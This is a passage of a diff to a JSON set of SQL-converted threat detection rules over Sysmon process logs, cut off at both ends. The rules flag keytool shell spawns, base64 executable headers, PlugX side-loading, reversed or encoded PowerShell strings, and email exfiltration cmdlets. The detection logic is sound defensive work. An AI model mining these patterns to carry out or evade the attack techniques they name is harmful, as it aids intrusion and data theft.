Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1574.002" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "status": "experimental", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "test", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "GPO" + "Various applications", + "Tools that include ping or nslookup command invocations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_screensaver.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.defense_evasion" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR 